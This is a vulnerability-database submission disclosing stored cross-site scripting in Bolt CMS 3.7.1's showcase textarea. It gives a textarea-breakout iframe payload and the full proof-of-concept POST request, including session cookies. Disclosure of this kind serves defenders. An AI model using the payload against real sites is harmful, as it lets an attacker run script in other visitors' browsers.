Submit #391532: Bolt CMS 3.7.1 XSSinfo

TitleBolt CMS 3.7.1 XSS
DescriptionBolt CMS 3.7.1 allows an authenticated user to insert an XSS script in the textarea parameter, when accessing the showcase page in question, XSS occurs 1. Once logged in go to showcases > New showcase 2. set Payload </textarea><iframe src="javascript:alert(`Hi :) `)"> in textarea parameter 3. After save, access http://192.168.20.40/showcase/xss Poc POST /bolt/editcontent/showcases/1 HTTP/1.1 Host: 10.10.122.116 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1155 Origin: http://192.168.20.40 Connection: close Referer: http://192.168.20.40/bolt/editcontent/showcases/1 Cookie: bolt_session_767077c1a5ffbbd8196c82f211235a92=7a832e152ed2e2ee0e7c6259f6; bolt_authtoken_767077c1a5ffbbd8196c82f211235a92=6e890d4f85a4c7c5cb0cf6f1a50883d40ffca79ffdd066adf65ebad7307d2af3 content_edit%5B_token%5D=3RgERLUxl5omlKW6HnG9C9Af15NSHO8Og9-LOqJR9Yg&editreferrer=&contenttype=showcases&title=Test&slug=xss&html=&textarea=%3C%2Ftextarea%3E%3Ciframe+src%3D%22javascript%3Aalert(%60Hi+%3A)+%60)%22%3E&markdown=&geolocation%5Baddress%5D=&geolocation%5Blatitude%5D=&geolocation%5Blongitude%5D=&geolocation%5Bformatted_address%5D=&embed%5Burl%5D=&embed%5Bwidth%5D=&embed%5Bheight%5D=&embed%5Bprovider_name%5D=&embed%5Bauthor_name%5D=&embed%5Bauthor_url%5D=&embed%5Bhtml%5D=&embed%5Bthumbnail%5D=&video%5Burl%5D=&video%5Bwidth%5D=&video%5Bheight%5D=&video%5Btitle%5D=&video%5Bauthorname%5D=&video%5Bratio%5D=&video%5Bauthorurl%5D=&video%5Bhtml%5D=&video%5Bthumbnail%5D=&image%5Bfile%5D=&image%5Btitle%5D=&imagelist=%5B%5D&file=&filelist=%5B%5D&datetime=2000-01-01+00%3A00%3A00&date=2024-07-01&integerfield=0&floatfield=0&selectfield=&selectentry=&repeater%5B%5D=&repeater%5B0%5D%5Brepeattitle%5D=&repeater%5B0%5D%5Brepeatimage%5D%5Bfile%5D=&repeater%5B0%5D%5Brepeatcontent%5D=&relation%5Bentries%5D%5B%5D=&id=1&status=published&datepublish=2024-08-15+00%3A05%3A00&datedepublish=&ownerid=1&_live-editor-preview=&content_edit%5Bsave%5D=undefined
User
 Dhimitri (UID 45045)
Submission08/15/2024 02:38 (2 years ago)
Moderation08/19/2024 15:34 (5 days later)
StatusDuplicate
VulDB entry273168 [Bolt CMS 3.7.1 Showcase Creation showcases title/textarea cross site scripting]
Points0

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!